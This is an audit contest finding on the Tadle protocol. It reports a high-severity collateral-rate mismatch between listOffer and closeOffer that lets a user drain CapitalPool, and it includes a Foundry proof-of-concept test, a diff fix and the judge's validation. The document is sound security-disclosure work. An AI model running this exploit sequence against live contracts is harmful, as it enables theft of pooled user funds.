Tadle

DeFiFoundry

27,750 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

User can drain CapitalPool due to incorret collateral rate setup

ke1caM

Vulnerability details

When user calls listOffer to sell his points, there are 3 parameters that he has to pass. _stock is the stock that the user wants to list. _amount is the new price that the user sells the points for. _collateralRate new collateral rate that the user has to deposit.

There is an issue in listOffer where this function calculates new deposit amount using old offerInfo.collateralRate, not the new _collateralRate passed by user. When user closes his offer by calling closeOffer, the new collateral rate will be used to calculate the refund amount.

It means that user will deposit collateral based on previous rate but when he closes an offer he will receive tokens based on new _collateralRate passed by user.

Attacker can drain CapitalPool using this exploit.

We can see that in protected mode the transferAmount is calculated using offerInfo.collateralRate.

if (makerInfo.offerSettleType == OfferSettleType.Protected) {

uint256 transferAmount = OfferLibraries.getDepositAmount(

offerInfo.offerType,

offerInfo.collateralRate, // <-- old collateral rate

_amount,

true,

Math.Rounding.Ceil

);

ITokenManager tokenManager = tadleFactory.getTokenManager();

tokenManager.tillIn{value: msg.value}(

_msgSender(),

makerInfo.tokenAddress,

transferAmount,

false

);

}

_collateralRate passed by user is set up as new collateral rate.

offerInfoMap[offerAddr] = OfferInfo({

id: stockInfo.id,

authority: _msgSender(),

maker: offerInfo.maker,

offerStatus: OfferStatus.Virgin,

offerType: offerInfo.offerType,

abortOfferStatus: AbortOfferStatus.Initialized,

points: stockInfo.points,

amount: _amount,

collateralRate: _collateralRate, // <-- user's new collateral rate

usedPoints: 0,

tradeTax: 0,

settledPoints: 0,

settledPointTokenAmount: 0,

settledCollateralAmount: 0

});

In closeOffer function the refundAmount is calculated using user's collateral rate.

if (

makerInfo.offerSettleType == OfferSettleType.Protected ||

stockInfo.preOffer == address(0x0)

) {

uint256 refundAmount = OfferLibraries.getRefundAmount(

offerInfo.offerType,

offerInfo.amount,

offerInfo.points,

offerInfo.usedPoints,

offerInfo.collateralRate // <-- user's collateral rate

);

ITokenManager tokenManager = tadleFactory.getTokenManager();

tokenManager.addTokenBalance(

TokenBalanceType.MakerRefund,

_msgSender(),

makerInfo.tokenAddress,

refundAmount

);

}

Proof of Concept

Create new solidity test and paste the code. Run forge test --match-contract "Playground" -vvv.

At the end there is an assertion which ensures that attacker has been credited more tokens than he deposited.

// SPDX-License-Identifier: GPL-2.0-or-later

pragma solidity ^0.8.13;

import {Test, console2} from "forge-std/Test.sol";

import {SystemConfig} from "../src/core/SystemConfig.sol";

import {CapitalPool} from "../src/core/CapitalPool.sol";

import {TokenManager} from "../src/core/TokenManager.sol";

import {PreMarktes} from "../src/core/PreMarkets.sol";

import {DeliveryPlace} from "../src/core/DeliveryPlace.sol";

import {TadleFactory} from "../src/factory/TadleFactory.sol";

import {OfferStatus, StockStatus, AbortOfferStatus, OfferType, StockType, OfferSettleType} from "../src/storage/OfferStatus.sol";

import {IPerMarkets, OfferInfo, StockInfo, MakerInfo, CreateOfferParams} from "../src/interfaces/IPerMarkets.sol";

import {TokenBalanceType, ITokenManager} from "../src/interfaces/ITokenManager.sol";

import {GenerateAddress} from "../src/libraries/GenerateAddress.sol";

import {MockERC20Token} from "./mocks/MockERC20Token.sol";

import {WETH9} from "./mocks/WETH9.sol";

import {UpgradeableProxy} from "../src/proxy/UpgradeableProxy.sol";

contract Playground is Test {

SystemConfig systemConfig;

CapitalPool capitalPool;

TokenManager tokenManager;

PreMarktes preMarktes;

DeliveryPlace deliveryPlace;

address marketPlace;

WETH9 weth9;

MockERC20Token mockUSDCToken;

MockERC20Token mockPointToken;

address user = vm.addr(1);

address user1 = vm.addr(2);

address user2 = vm.addr(3);

address user3 = vm.addr(4);

uint256 basePlatformFeeRate = 5_000;

uint256 baseReferralRate = 300_000;

bytes4 private constant INITIALIZE_OWNERSHIP_SELECTOR =

bytes4(keccak256(bytes("initializeOwnership(address)")));

function setUp() public {

// deploy mocks

weth9 = new WETH9();

TadleFactory tadleFactory = new TadleFactory(user1);

mockUSDCToken = new MockERC20Token();

mockPointToken = new MockERC20Token();

SystemConfig systemConfigLogic = new SystemConfig();

CapitalPool capitalPoolLogic = new CapitalPool();

TokenManager tokenManagerLogic = new TokenManager();

PreMarktes preMarktesLogic = new PreMarktes();

DeliveryPlace deliveryPlaceLogic = new DeliveryPlace();

bytes memory deploy_data = abi.encodeWithSelector(

INITIALIZE_OWNERSHIP_SELECTOR,

user1

);

vm.startPrank(user1);

address systemConfigProxy = tadleFactory.deployUpgradeableProxy(

address(systemConfigLogic),

bytes(deploy_data)

);

address preMarktesProxy = tadleFactory.deployUpgradeableProxy(

address(preMarktesLogic),

bytes(deploy_data)

);

address deliveryPlaceProxy = tadleFactory.deployUpgradeableProxy(

address(deliveryPlaceLogic),

bytes(deploy_data)

);

address capitalPoolProxy = tadleFactory.deployUpgradeableProxy(

address(capitalPoolLogic),

bytes(deploy_data)

);

address tokenManagerProxy = tadleFactory.deployUpgradeableProxy(

address(tokenManagerLogic),

bytes(deploy_data)

);

vm.stopPrank();

// attach logic

systemConfig = SystemConfig(systemConfigProxy);

capitalPool = CapitalPool(capitalPoolProxy);

tokenManager = TokenManager(tokenManagerProxy);

preMarktes = PreMarktes(preMarktesProxy);

deliveryPlace = DeliveryPlace(deliveryPlaceProxy);

vm.startPrank(user1);

// initialize

systemConfig.initialize(basePlatformFeeRate, baseReferralRate);

tokenManager.initialize(address(weth9));

address[] memory tokenAddressList = new address[](2);

tokenAddressList[0] = address(mockUSDCToken);

tokenAddressList[1] = address(weth9);

tokenManager.updateTokenWhiteListed(tokenAddressList, true);

// create market place

systemConfig.createMarketPlace("Backpack", false);

vm.stopPrank();

deal(address(mockUSDCToken), user, 100000000 * 10 ** 18);

deal(address(mockPointToken), user, 100000000 * 10 ** 18);

deal(user, 100000000 * 10 ** 18);

deal(address(mockUSDCToken), user1, 100000000 * 10 ** 18);

deal(address(mockUSDCToken), user2, 100000000 * 10 ** 18);

deal(address(mockUSDCToken), user3, 100000000 * 10 ** 18);

deal(address(mockPointToken), user2, 100000000 * 10 ** 18);

marketPlace = GenerateAddress.generateMarketPlaceAddress("Backpack");

vm.warp(1719826275);

vm.prank(user);

mockUSDCToken.approve(address(tokenManager), type(uint256).max);

vm.startPrank(user2);

mockUSDCToken.approve(address(tokenManager), type(uint256).max);

mockPointToken.approve(address(tokenManager), type(uint256).max);

vm.stopPrank();

}

function testUserReceiveMoreTokens() public {

vm.prank(user);

preMarktes.createOffer(

CreateOfferParams(

marketPlace,

address(mockUSDCToken),

1000,

1 ether,

10000,

300,

OfferType.Ask,

OfferSettleType.Protected

)

);

vm.startPrank(user2);

address offerAddr = GenerateAddress.generateOfferAddress(0);

preMarktes.createTaker(offerAddr, 100);

address stock1Addr = GenerateAddress.generateStockAddress(1);

preMarktes.listOffer(stock1Addr, 1 ether, 12000);

address offer1Addr = GenerateAddress.generateOfferAddress(1);

preMarktes.closeOffer(stock1Addr, offer1Addr);

vm.stopPrank();

uint256 userTokenBalance = tokenManager.userTokenBalanceMap(

user2,

address(mockUSDCToken),

TokenBalanceType.MakerRefund

);

// 1 ether is the collateral amount that the user deposited when he listed na offer (1 ether * 10000 / 10000)

assertLt(1 ether, userTokenBalance);

}

Impact

Attacker can fully drain CapitalPool.

Recommended Mitigation Steps

Use collateral rate passed by user to calculated transferAmount in listOffer function.

function listOffer(

address _stock,

uint256 _amount,

uint256 _collateralRate

) external payable {

if (_amount == 0x0) {

revert Errors.AmountIsZero();

}

if (_collateralRate < Constants.COLLATERAL_RATE_DECIMAL_SCALER) {

revert InvalidCollateralRate();

}

StockInfo storage stockInfo = stockInfoMap[_stock];

if (_msgSender() != stockInfo.authority) {

revert Errors.Unauthorized();

}

OfferInfo storage offerInfo = offerInfoMap[stockInfo.preOffer];

MakerInfo storage makerInfo = makerInfoMap[offerInfo.maker];

/// @dev market place must be online

ISystemConfig systemConfig = tadleFactory.getSystemConfig();

MarketPlaceInfo memory marketPlaceInfo = systemConfig

.getMarketPlaceInfo(makerInfo.marketPlace);

marketPlaceInfo.checkMarketPlaceStatus(

block.timestamp,

MarketPlaceStatus.Online

);

if (stockInfo.offer != address(0x0)) {

revert OfferAlreadyExist();

}

if (stockInfo.stockType != StockType.Bid) {

revert InvalidStockType(StockType.Bid, stockInfo.stockType);

}

/// @dev change abort offer status when offer settle type is turbo

if (makerInfo.offerSettleType == OfferSettleType.Turbo) {

address originOffer = makerInfo.originOffer;

OfferInfo memory originOfferInfo = offerInfoMap[originOffer];

if (_collateralRate != originOfferInfo.collateralRate) {

revert InvalidCollateralRate();

}

originOfferInfo.abortOfferStatus = AbortOfferStatus.SubOfferListed;

}

/// @dev transfer collateral when offer settle type is protected

if (makerInfo.offerSettleType == OfferSettleType.Protected) {

uint256 transferAmount = OfferLibraries.getDepositAmount(

offerInfo.offerType,

- offerInfo.collateralRate,

+ _collateralRate,

_amount,

true,

Math.Rounding.Ceil

);

ITokenManager tokenManager = tadleFactory.getTokenManager();

tokenManager.tillIn{value: msg.value}(

_msgSender(),

makerInfo.tokenAddress,

transferAmount,

false

);

}

address offerAddr = GenerateAddress.generateOfferAddress(stockInfo.id);

if (offerInfoMap[offerAddr].authority != address(0x0)) {

revert OfferAlreadyExist();

}

/// @dev update offer info

offerInfoMap[offerAddr] = OfferInfo({

id: stockInfo.id,

authority: _msgSender(),

maker: offerInfo.maker,

offerStatus: OfferStatus.Virgin,

offerType: offerInfo.offerType,

abortOfferStatus: AbortOfferStatus.Initialized,

points: stockInfo.points,

amount: _amount,

collateralRate: _collateralRate,

usedPoints: 0,

tradeTax: 0,

settledPoints: 0,

settledPointTokenAmount: 0,

settledCollateralAmount: 0

});

stockInfo.offer = offerAddr;

emit ListOffer(

offerAddr,

_stock,

_msgSender(),

stockInfo.points,

_amount

);

}

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-PreMarkets-listOffer-collateralRate-manipulate

Valid high severity, because the collateral rate utilized when creating an offer is stale and retrieved from a previously set collateral rate, it allows possible manipilation of refund amounts using an inflated collateral rate to drain funds from the CapitalPool contract

Prize pool breakdown

Total prize

27,750 USDC

nSLOC

1,229

23 USDC / LOC

High Medium

25,000 USDC

Low

2,750 USDC

Judges

2,250 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!